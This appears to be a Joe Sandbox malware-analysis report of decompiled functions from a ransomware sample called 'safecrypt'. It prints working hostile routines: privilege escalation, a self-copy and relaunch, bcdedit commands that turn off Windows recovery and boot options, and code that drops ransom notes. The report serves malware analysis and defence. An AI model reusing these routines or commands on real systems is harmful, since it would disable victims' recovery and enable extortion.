                    				_t101 = LookupPrivilegeValueA(0, "SeDebugPrivilege",  &_v140); // executed
                    				if(_t101 != 0) {
                    					E004204D0( &_a12,  &_v140); // executed
                    				}
                    				_t205 =  &_v176;
                    				_t102 = E0041FC40( &_v176); // executed
                    				_t248 = _t247 + 4;
                    				if(_t102 == 0) {
                    					_t103 = E0041FD50(0, __eflags);
                    					__eflags = _t103;
                    					if(_t103 != 0) {
                    						goto L12;
                    					} else {
                    						goto L18;
                    					}
                    				} else {
                    					_t168 = _v176;
                    					_t274 = _t168 - 0x2000;
                    					if(_t274 > 0) {
                    						__eflags = _t168 - 0x3000;
                    						if(__eflags == 0) {
                    							goto L15;
                    						} else {
                    							__eflags = _t168 - 0x4000;
                    							if(__eflags != 0) {
                    								goto L18;
                    							} else {
                    								goto L15;
                    							}
                    						}
                    					} else {
                    						if(_t274 == 0) {
                    							L15:
                    							_t169 = E0041FD50(0, __eflags); // executed
                    							__eflags = _t169;
                    							if(_t169 == 0) {
                    								goto L18;
                    							} else {
                    								_pop(_t228);
                    								_pop(_t238);
                    								_pop(_t182);
                    								__eflags = _a8572 ^ _t248;
                    								return E004256D3(1, _t182, _a8572 ^ _t248, _t205, _t228, _t238);
                    							}
                    						} else {
                    							if(_t168 == 0 || _t168 == 0x1000) {
                    								E0041EB60();
                    								goto L12;
                    							} else {
                    								L18:
                    								_t106 = E00412FC0(_t205, 0, 1, 0xbf78968a);
                    								_t248 = _t248 + 0xc;
                    								 *_t106(0, 0, L"__sys_234238233295");
                    								_t108 = GetLastError();
                    								__eflags = _t108 - 0xb7;
                    								if(_t108 == 0xb7) {
                    									L12:
                    									_pop(_t224);
                    									_pop(_t231);
                    									_pop(_t180);
                    									return E004256D3(1, _t180, _a8572 ^ _t248, _t205, _t224, _t231);
                    								} else {
                    									E0042C770(0x43f9f0, 0, 0x11c);
                    									0x43f9f0->dwOSVersionInfoSize = 0x11c;
                    									GetVersionExW(0x43f9f0);
                    									E00401470(0, _t223, __eflags);
                    									E0041FFF0(__eflags);
                    									 *0x46844c = 1;
                    									_t113 = E00412FC0(_t205, 0, 1, 0x6fb89af0);
                    									 *_t113(0, 0, E00420200, 0, 0, 0);
                    									_v200 = 0;
                    									CreateThread(0, 0, E0041ED00, 0, 0,  &_v200);
                    									E0041F1C0("bcdedit.exe /set {current} bootems off");
                    									E0041F1C0("bcdedit.exe /set {current} advancedoptions off");
                    									E0041F1C0("bcdedit.exe /set {current} optionsedit off");
                    									E0041F1C0("bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures");
                    									E0041F1C0("bcdedit.exe /set {current} recoveryenabled off");
                    									E0041EEE0(_t223);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									E00420730(0x3a98, 0x460b30,  *0x460aac, 0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									E00420730(0x3a98, 0x4647c0,  *0x4647bc, 0x43fee0);
                    									_v144 = 0;
                    									E0042C770( &_v143, 0, 0x1df);
                    									_t257 = _t248 + 0xe4;
                    									_t189 =  &_v144;
                    									_t232 = 0x43ff40;
                    									do {
                    										_t127 =  *_t232 & 0x000000ff;
                    										_t38 =  &(("0123456789ABCDEF")[_t127 >> 4]); // 0x33323130
                    										_t211 =  *_t38;
                    										_t39 =  &(("0123456789ABCDEF")[_t127 & 0x0000000f]); // 0x33323130
                    										 *_t189 =  *_t38;
                    										 *((char*)(_t189 + 1)) =  *_t39;
                    										_t232 =  &(_t232[1]);
                    										_t189 = _t189 + 2;
                    										__eflags = _t232 - 0x43ffa1;
                    									} while (_t232 != 0x43ffa1);
                    									 *_t189 = 0;
                    									_t130 = E0042643B( &_v208, 0x47e450, L"w+");
                    									_t258 = _t257 + 0xc;
                    									__eflags = _t130;
                    									if(__eflags == 0) {
                    										_push( *0x460a78);
                    										_push(0x43fee0);
                    										_push( &_v144);
                    										_push(0x43ff10);
                    										_push("%s\n%s\n%S\n%d\n");
                    										_push(_v208);
                    										E00426482(0, _t223, _t232, __eflags);
                    										_t211 = _v208;
                    										_push(_v208);
                    										E004265FB(0, _t223, _t232, __eflags);
                    										_t258 = _t258 + 0x1c;
                    									}
                    									_v176 = 0;
                    									_v172 = 0;
                    									_v168 = 0;
                    									_v180 = 0;
                    									_t133 = E00420560( &_v180);
                    									_t225 = _t133;
                    									__eflags = _t225;
                    									if(_t225 != 0) {
                    										__imp__GdipAlloc(0x10);
                    										_t237 = _t133;
                    										__eflags = _t237;
                    										if(_t237 == 0) {
                    											_t237 = 0;
                    											__eflags = 0;
                    										} else {
                    											_t133 =  &_v220;
                    											 *_t237 = 0x439e88;
                    											_v220 = 0;
                    											__imp__GdipCreateBitmapFromHBITMAP(_t225, 0, _t133);
                    											 *(_t237 + 8) = _t133;
                    											 *((intOrPtr*)(_t237 + 4)) = _v232;
                    										}
                    										 *0x480484 = _t237;
                    									}
                    									E00423420(_t133);
                    									_t226 = 0;
                    									__eflags =  *0x43fed4 - 1;
                    									if( *0x43fed4 == 1) {
                    										 *0x460a7c = 0;
                    										_t163 = E00412FC0(_t211, 0, 1, 0x6fb89af0);
                    										_t258 = _t258 + 0xc;
                    										_t226 =  *_t163(0, 0, E0041B6A0, 0, 0, 0);
                    									}
                    									_t233 = CreateThread(0, 0, E00413860, 0, 0, 0);
                    									SetThreadPriority(_t233, 0xfffffff1);
                    									WaitForSingleObject(_t233, 0xffffffff);
                    									_a332 = 0;
                    									E0042C770( &_a334, 0, 0x1ffe);
                    									E00414320(0x1000,  &_a332, L"%s\\help_recover_instructions.TXT", 0x46e450);
                    									E0041FB80( &_a332,  &_a332);
                    									E00420750( &_a332, L"open");
                    									E00414320(0x1000,  &_a332, L"%s\\help_recover_instructions%s", 0x46e450);
                    									E0041FBE0( &_a332,  &_a332);
                    									E00420750( &_a332, L"open");
                    									E00414320(0x1000,  &_a332, L"%s\\help_recover_instructions.png", 0x46e450);
                    									_t150 =  *0x480484;
                    									_t217 =  *((intOrPtr*)(_t150 + 4));
                    									_t263 = _t258 + 0x3c;
                    									_t234 = _t150;
                    									__imp__GdipSaveImageToFile( *((intOrPtr*)(_t150 + 4)),  &_a332, 0x43f9e0, 0, L".HTM");
                    									__eflags = _t150;
                    									if(_t150 != 0) {
                    										 *(_t234 + 8) = _t150;
                    									}
                    									E00420750( &_a316, L"open");
                    									_t152 = E00412FC0(_t217, 0, 1, 0x6fb89af0);
                    									 *_t152(0, 0, E0041ED00, 0, 0, 0);
                    									_t154 = E00412FC0(_t217, 0, 1, 0xc54374f3);
                    									 *_t154(_t226, 0x493e0);
                    									 *0x460a7c = 1;
                    									_t156 = E00412FC0(_t217, 0, 1, 0x6fb89af0);
                    									_t157 =  *_t156(0, 0, E0041B6A0, 0, 0, 0);
                    									_t158 = E00412FC0(_t217, 0, 1, 0xc54374f3);
                    									 *_t158();
                    									E0041FEC0(0, _t217, _t226, _t157, __eflags);
                    									_t227 = _t157;
                    									_t236 = 0xea60;
                    									_pop(_t181);
                    									__eflags = 0;
                    									return E004256D3(0, _t181, _a8448 ^ _t263 + 0x34, _t217, _t227, _t236);
                    								}
                    							}
                    						}
                    					}
                    				}
                    			}
                    0x0041f906
                    0x0041f908
                    0x0041f914
                    0x0041f915
                    0x0041f91e
                    0x0041f91f
                    0x0041f924
                    0x0041f929
                    0x0041f92a
                    0x0041f92f
                    0x0041f933
                    0x0041f934
                    0x0041f939
                    0x0041f939
                    0x0041f93e
                    0x0041f942
                    0x0041f946
                    0x0041f94e
                    0x0041f952
                    0x0041f957
                    0x0041f959
                    0x0041f95b
                    0x0041f95f
                    0x0041f965
                    0x0041f967
                    0x0041f969
                    0x0041f98e
                    0x0041f98e
                    0x0041f96b
                    0x0041f96b
                    0x0041f972
                    0x0041f978
                    0x0041f97c
                    0x0041f986
                    0x0041f989
                    0x0041f989
                    0x0041f990
                    0x0041f990
                    0x0041f996
                    0x0041f99b
                    0x0041f99d
                    0x0041f9a4
                    0x0041f9ae
                    0x0041f9b4
                    0x0041f9b9
                    0x0041f9c8
                    0x0041f9c8
                    0x0041f9da
                    0x0041f9df
                    0x0041f9e8
                    0x0041f9fe
                    0x0041fa06
                    0x0041fa25
                    0x0041fa34
                    0x0041fa45
                    0x0041fa69
                    0x0041fa75
                    0x0041fa86
                    0x0041faa5
                    0x0041faaa
                    0x0041faaf
                    0x0041fab2
                    0x0041fac4
                    0x0041fac6
                    0x0041facc
                    0x0041face
                    0x0041fad0
                    0x0041fad0
                    0x0041fadf
                    0x0041faef
                    0x0041fb01
                    0x0041fb0b
                    0x0041fb19
                    0x0041fb23
                    0x0041fb2d
                    0x0041fb3f
                    0x0041fb4b
                    0x0041fb59
                    0x0041fb5b
                    0x0041fb67
                    0x0041fb68
                    0x0041fb69
                    0x0041fb6c
                    0x0041fb76
                    0x0041fb76
                    0x0041f6f5
                    0x0041f66b
                    0x0041f667
                    0x0041f665

                    APIs
                    • CoInitializeEx.OLE32(00000000,00000000), ref: 0041F405
                    • GdiplusStartup.GDIPLUS(?,?,?,?,?,?,?,00000000), ref: 0041F42A
                      • Part of subcall function 0041F2F0: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0041F308
                    • AllocateAndInitializeSid.ADVAPI32(?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0041F45D
                    • CheckTokenMembership.ADVAPI32(00000000,?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041F476
                    • FreeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0041F489
                    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,0046C450,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000), ref: 0041F4A8
                    • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0041F4DC
                    • LoadStringW.USER32(00000000,00005509,00470450,000000FF), ref: 0041F4FA
                    • LoadStringW.USER32(00000000,00005527,00472450,000000FF), ref: 0041F50C
                    • GetModuleHandleW.KERNEL32(KERNEL32), ref: 0041F513
                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0041F527
                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 0041F534
                    • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,00476450), ref: 0041F547
                    • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,00478450), ref: 0041F553
                    • SHGetFolderPathW.SHELL32(00000000,0000003B,00000000,00000000,0047C450), ref: 0041F55F
                    • SHGetSpecialFolderPathW.SHELL32(00000000,0047E450,00000005,00000000), ref: 0041F56A
                    • SHGetFolderPathW.SHELL32(00000000,00000010,00000000,00000000,0046E450), ref: 0041F5BF
                    • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,00474450), ref: 0041F5CB
                    • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0047A450), ref: 0041F5D7
                    • GetModuleFileNameW.KERNEL32(00000000,0046A450,00001000), ref: 0041F5E4
                    • DeleteFileW.KERNELBASE(00468450), ref: 0041F61D
                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0041F638
                    • GetLastError.KERNEL32 ref: 0041F6EA
                    • _memset.LIBCMT ref: 0041F702
                    • GetVersionExW.KERNEL32(0043F9F0), ref: 0041F719
                    • CreateThread.KERNEL32 ref: 0041F761
                      • Part of subcall function 0041FD50: _memset.LIBCMT ref: 0041FD7F
                      • Part of subcall function 0041FD50: PathFindFileNameW.SHLWAPI(0046A450,?,00000000,74A33620,?,0041F6CD), ref: 0041FD97
                      • Part of subcall function 0041FD50: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,00000000,74A33620,?,0041F6CD), ref: 0041FDD2
                      • Part of subcall function 0041FD50: GetLastError.KERNEL32(?,?,?,?,?,00000000,74A33620,?,0041F6CD), ref: 0041FDDA
                      • Part of subcall function 0041FD50: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,00000000,74A33620,?,0041F6CD), ref: 0041FDE3
                      • Part of subcall function 0041FD50: CopyFileW.KERNELBASE(0046A450,?,00000000,?,?,?,?,?,?,?,?,?,00000000,74A33620,?,0041F6CD), ref: 0041FE2E
                      • Part of subcall function 0041FD50: _memset.LIBCMT ref: 0041FE3B
                      • Part of subcall function 0041FD50: CreateProcessW.KERNELBASE ref: 0041FE82
                    • _memset.LIBCMT ref: 0041F8B4
                    • __wfopen_s.LIBCMT ref: 0041F8FE
                    • _fprintf.LIBCMT ref: 0041F92A
                    • GdipAlloc.GDIPLUS(00000010), ref: 0041F95F
                    • GdipCreateBitmapFromHBITMAP.GDIPLUS(00000000,00000000,?), ref: 0041F97C
                    • CreateThread.KERNEL32 ref: 0041F9D4
                    • SetThreadPriority.KERNEL32(00000000,000000F1), ref: 0041F9DF
                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041F9E8
                    • _memset.LIBCMT ref: 0041FA06
                      • Part of subcall function 00414320: __strftime_l.LIBCMT ref: 00414335
                      • Part of subcall function 0041FB80: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,00000000), ref: 0041FB9F
                      • Part of subcall function 0041FB80: WriteFile.KERNEL32(00000000,00460B30,00460B31,00000000,00000000), ref: 0041FBCA
                      • Part of subcall function 0041FB80: CloseHandle.KERNEL32(00000000), ref: 0041FBD1
                      • Part of subcall function 0041FBE0: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,?,?,0041FA7A,?,%s\help_recover_instructions%s,0046E450), ref: 0041FBFF
                      • Part of subcall function 0041FBE0: WriteFile.KERNEL32(00000000,004647C0,004647C1,00000000,00000000,?,?,0041FA7A,?,%s\help_recover_instructions%s,0046E450), ref: 0041FC2A
                      • Part of subcall function 0041FBE0: CloseHandle.KERNEL32(00000000,?,?,0041FA7A,?,%s\help_recover_instructions%s,0046E450), ref: 0041FC31
                    • GdipSaveImageToFile.GDIPLUS(?,?,0043F9E0,00000000), ref: 0041FAC6
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000002.328968362.0000000000482000.00000040.00000001.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Path$Folder$Create$_memset$Gdip$CloseHandleLoadThread$AddressErrorFindImageInitializeLastModuleNameProcStringWrite$AllocAllocateBitmapChangeCheckCopyDeleteEncodersFreeFromGdiplusLibraryLookupMembershipNotificationObjectPriorityPrivilegeProcessSaveSingleSizeSpecialStartupTokenValueVersionWait__strftime_l__wfopen_s_fprintf
                    • String ID: %s%s%S%d$%s\help_recover_instructions%s$%s\help_recover_instructions.TXT$%s\help_recover_instructions.png$.HTM$.txt$:Zone.Identifier$KERNEL32$SeDebugPrivilege$Shell32.dll$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$\recover_file_$__sys_234238233295$bcdedit.exe /set {current} advancedoptions off$bcdedit.exe /set {current} bootems off$bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures$bcdedit.exe /set {current} optionsedit off$bcdedit.exe /set {current} recoveryenabled off$open$open$open
                    • API String ID: 640529482-1698839232
                    Uniqueness

                    Uniqueness Score: -1.00%


                    C-Code - Quality: 89%
                    			E004204D0(intOrPtr __edx, intOrPtr __esi) {
                    				signed int _v8;
                    				intOrPtr _v12;
                    				intOrPtr _v16;
                    				struct _TOKEN_PRIVILEGES _v24;
                    				void* _v28;
                    				signed int _t13;
                    				intOrPtr _t24;
                    				intOrPtr _t31;
                    				intOrPtr _t34;
                    				signed int _t36;
                    
                    				_t31 = __edx;
                    				_t13 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t13 ^ _t36;
                    				if(OpenProcessToken(GetCurrentProcess(), 0x20028,  &_v28) != 0) {
                    					_v24.Privileges =  *((intOrPtr*)(__esi));
                    					_v24.PrivilegeCount = 1;
                    					_v16 =  *((intOrPtr*)(__esi + 4));
                    					_v12 = 2;
                    					AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0); // executed
                    					FindCloseChangeNotification(_v28); // executed
                    					return E004256D3(1, _t24, _v8 ^ _t36, _v28, _t34, __esi);
                    				} else {
                    					return E004256D3(_t17, _t24, _v8 ^ _t36, _t31, _t34, __esi);
                    				}
                    			}














                    APIs
                    • GetCurrentProcess.KERNEL32(00020028,?,?,?,?,?,?,0041F64B), ref: 004204E9
                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0041F64B), ref: 004204F0
                    • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000000,00000000,00000000), ref: 00420531
                    • FindCloseChangeNotification.KERNELBASE(?), ref: 0042053B
                    Memory Dump Source
                    • Source File: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000002.328968362.0000000000482000.00000040.00000001.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProcessToken$AdjustChangeCloseCurrentFindNotificationOpenPrivileges
                    • String ID:
                    • API String ID: 980374797-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041FC40(long* _a4) {
                    				long _v8;
                    				void* _v12;
                    				long _v16;
                    				int _t25;
                    				int _t29;
                    				void* _t32;
                    				void* _t58;
                    
                    				_t58 = 0;
                    				_v8 = 0;
                    				_v12 = 0;
                    				_v16 = 0;
                    				if(_a4 != 0) {
                    					if(OpenProcessToken(GetCurrentProcess(), 8,  &_v12) != 0) {
                    						_t25 = GetTokenInformation(_v12, 0x19, 0, 0,  &_v16); // executed
                    						if(_t25 != 0 || GetLastError() == 0x7a) {
                    							_t58 = LocalAlloc(0x40, _v16);
                    							if(_t58 != 0) {
                    								_t29 = GetTokenInformation(_v12, 0x19, _t58, _v16,  &_v16); // executed
                    								if(_t29 != 0) {
                    									 *_a4 =  *(GetSidSubAuthority( *_t58, 0));
                    								} else {
                    									_v8 = GetLastError();
                    								}
                    							} else {
                    								_v8 = GetLastError();
                    							}
                    						} else {
                    							_v8 = GetLastError();
                    						}
                    					} else {
                    						_v8 = GetLastError();
                    					}
                    					_t32 = _v12;
                    					if(_t32 != 0) {
                    						CloseHandle(_t32);
                    						_v12 = 0;
                    					}
                    					if(_t58 != 0) {
                    						LocalFree(_t58);
                    						_v16 = 0;
                    					}
                    					if(_v8 == 0) {
                    						return 1;
                    					} else {
                    						SetLastError(_v8);
                    						return 0;
                    					}
                    				} else {
                    					SetLastError(0x57);
                    					return 0;
                    				}
                    			}











                    APIs
                    • SetLastError.KERNEL32(00000057,74A33620,?,0041F655,?), ref: 0041FC5D
                    • GetCurrentProcess.KERNEL32(00000008,0041F655,00000000,74A33620,?,0041F655,?), ref: 0041FC71
                    • OpenProcessToken.ADVAPI32(00000000,?,0041F655,?), ref: 0041FC78
                    • GetLastError.KERNEL32(?,0041F655,?), ref: 0041FC82
                    • CloseHandle.KERNEL32(0041F655,00000000,?,0041F655,?), ref: 0041FD0C
                    • LocalFree.KERNEL32(00000000,00000000,?,0041F655,?), ref: 0041FD1A
                    • SetLastError.KERNEL32(?,?,0041F655,?), ref: 0041FD2D
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$Process$CloseCurrentFreeHandleLocalOpenToken
                    • String ID:
                    • API String ID: 1977215774-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E0041FD50(void* __ebx, void* __eflags) {
                    				signed int _v8;
                    				char _v28;
                    				char _v8218;
                    				short _v8220;
                    				struct _STARTUPINFOW _v8292;
                    				struct _PROCESS_INFORMATION _v8308;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t21;
                    				void* _t29;
                    				long _t30;
                    				int _t40;
                    				signed int _t63;
                    				void* _t64;
                    				void* _t66;
                    				void* _t67;
                    
                    				E0042DFB0(0x2070);
                    				_t21 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t21 ^ _t63;
                    				_v8220 = 0;
                    				E0042C770( &_v8218, 0, 0x1ffe);
                    				E004233B0( &_v28, 7); // executed
                    				_push(PathFindFileNameW(0x46a450));
                    				E00414320(0x1000,  &_v8220, L"%s\\%s", 0x46c450);
                    				_t66 = _t64 + 0x24;
                    				_t29 = CreateFileW( &_v8220, 0x80000000, 1, 0, 3, 0, 0); // executed
                    				_t61 = _t29;
                    				_t30 = GetLastError();
                    				_t59 = _t30; // executed
                    				FindCloseChangeNotification(_t29); // executed
                    				if(_t30 != 2) {
                    					__eflags = 0;
                    					return E004256D3(0, __ebx, _v8 ^ _t63, 0x1000, _t59, _t61);
                    				} else {
                    					_push( &_v28);
                    					E00414320(0x1000,  &_v8220, L"%s\\%s.exe", 0x46c450);
                    					_t67 = _t66 + 0x10;
                    					do {
                    						CopyFileW(0x46a450,  &_v8220, 0); // executed
                    						E0042C770( &_v8292, 0, 0x44);
                    						_t67 = _t67 + 0xc;
                    						_v8292.wShowWindow = 1;
                    						_v8292.dwFlags = 1;
                    						_v8292.cb = 0x44;
                    						_t40 = CreateProcessW(0,  &_v8220, 0, 0, 0, 0x20, 0, 0,  &_v8292,  &_v8308); // executed
                    						_t70 = _t40;
                    					} while (_t40 == 0);
                    					E0041FEC0(__ebx,  &_v8292, CreateProcessW, CopyFileW, _t70); // executed
                    					return E004256D3(1, __ebx, _v8 ^ _t63,  &_v8292, CreateProcessW, CopyFileW);
                    				}
                    			}




















                    APIs
                    • _memset.LIBCMT ref: 0041FD7F
                      • Part of subcall function 004233B0: GetTickCount.KERNEL32 ref: 004233C0
                      • Part of subcall function 004233B0: _rand.LIBCMT ref: 004233D0
                      • Part of subcall function 004233B0: Sleep.KERNELBASE(0000000F), ref: 004233F7
                    • PathFindFileNameW.SHLWAPI(0046A450,?,00000000,74A33620,?,0041F6CD), ref: 0041FD97
                      • Part of subcall function 00414320: __strftime_l.LIBCMT ref: 00414335
                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,00000000,74A33620,?,0041F6CD), ref: 0041FDD2
                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,74A33620,?,0041F6CD), ref: 0041FDDA
                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,00000000,74A33620,?,0041F6CD), ref: 0041FDE3
                    • CopyFileW.KERNELBASE(0046A450,?,00000000,?,?,?,?,?,?,?,?,?,00000000,74A33620,?,0041F6CD), ref: 0041FE2E
                    • _memset.LIBCMT ref: 0041FE3B
                    • CreateProcessW.KERNELBASE ref: 0041FE82
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CreateFind_memset$ChangeCloseCopyCountErrorLastNameNotificationPathProcessSleepTick__strftime_l_rand
                    • String ID: %s\%s$%s\%s.exe$D
                    • API String ID: 4011548120-1704063882
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00420440() {
                    				void _v8;
                    				long _v12;
                    				short _v15;
                    				void _v16;
                    				void* _t8;
                    				void* _t28;
                    
                    				_v8 = 0;
                    				_t8 = CreateFileW(0x46a450, 0x80000000, 1, 0, 3, 0, 0); // executed
                    				_t28 = _t8;
                    				if(_t28 == 0xffffffff) {
                    					return 0;
                    				} else {
                    					SetFilePointer(_t28, 0x3c, 0, 0); // executed
                    					ReadFile(_t28,  &_v8, 2,  &_v12, 0); // executed
                    					SetFilePointer(_t28, _v8 + 0x58, 0, 0); // executed
                    					ReadFile(_t28,  &_v16, 4,  &_v12, 0); // executed
                    					FindCloseChangeNotification(_t28); // executed
                    					return _v15;
                    				}
                    			}










                    APIs
                    • CreateFileW.KERNELBASE(0046A450,80000000,00000001,00000000,00000003,00000000,00000000,74A33620), ref: 00420462
                    • SetFilePointer.KERNELBASE(00000000,0000003C,00000000,00000000,00000000,00000000), ref: 0042047E
                    • ReadFile.KERNELBASE(00000000,00000000,00000002,?,00000000), ref: 00420493
                    • SetFilePointer.KERNELBASE(00000000,-00000058,00000000,00000000), ref: 004204A2
                    • ReadFile.KERNELBASE(00000000,?,00000004,?,00000000), ref: 004204B1
                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004204B4
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$PointerRead$ChangeCloseCreateFindNotification
                    • String ID:
                    • API String ID: 3963928282-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0042BC41() {
                    				WCHAR* _t2;
                    				void* _t4;
                    				void* _t15;
                    				WCHAR* _t17;
                    
                    				_t2 = GetEnvironmentStringsW();
                    				_t17 = _t2;
                    				if(_t17 != 0) {
                    					if( *_t17 != 0) {
                    						goto L3;
                    						do {
                    							do {
                    								L3:
                    								_t2 =  &(_t2[1]);
                    							} while ( *_t2 != 0);
                    							_t2 =  &(_t2[1]);
                    						} while ( *_t2 != 0);
                    					}
                    					_t1 = _t2 - _t17 + 2; // -2
                    					_t10 = _t1;
                    					_t4 = E0042C80D(_t1); // executed
                    					_t15 = _t4;
                    					if(_t15 != 0) {
                    						E0042E030(_t15, _t17, _t10);
                    					}
                    					FreeEnvironmentStringsW(_t17);
                    					return _t15;
                    				} else {
                    					return 0;
                    				}
                    			}








                    APIs
                    • GetEnvironmentStringsW.KERNEL32(00000000,00426837), ref: 0042BC44
                    • __malloc_crt.LIBCMT ref: 0042BC73
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042BC80
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: EnvironmentStrings$Free__malloc_crt
                    • String ID:
                    • API String ID: 237123855-0
                    • Opcode ID: 555d97773c19d80208110b5c039258f79e7c8eb5c7d493d4c0c8b22d6731b823
                    • Instruction ID: a6738784124e55191c45c375dc9ebad1cc1e94c158c890f0107cd78376825cd3
                    • Opcode Fuzzy Hash: 555d97773c19d80208110b5c039258f79e7c8eb5c7d493d4c0c8b22d6731b823
                    • Instruction Fuzzy Hash: 89F0E9777010305A8F217B36BC8589B1728CAD5364346442FF441C3214FF288D4183ED
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 52%
                    			E0041FEC0(intOrPtr __ebx, WCHAR* __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
                    				signed int _v8;
                    				short _v8200;
                    				char _v16392;
                    				signed int _t16;
                    				intOrPtr* _t18;
                    				long _t23;
                    				intOrPtr* _t29;
                    				void* _t31;
                    				signed int _t48;
                    
                    				_t47 = __esi;
                    				_t46 = __edi;
                    				_t44 = __edx;
                    				_t34 = __ebx;
                    				E0042DFB0(0x4004);
                    				_t16 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t16 ^ _t48;
                    				_t18 = E00412FC0(__edx, 0, 1, 0x774393fe);
                    				_push(0x1000);
                    				_push( &_v8200);
                    				_push(0);
                    				if( *_t18() == 0) {
                    					L5:
                    					return E004256D3(0, _t34, _v8 ^ _t48, _t44, _t46, _t47);
                    				} else {
                    					_t44 =  &_v8200;
                    					_t23 = GetShortPathNameW( &_v8200,  &_v8200, 0x1000); // executed
                    					if(_t23 == 0) {
                    						goto L5;
                    					} else {
                    						E00425E0C( &_v16392, 0x1000, L"/c ", 0x1000);
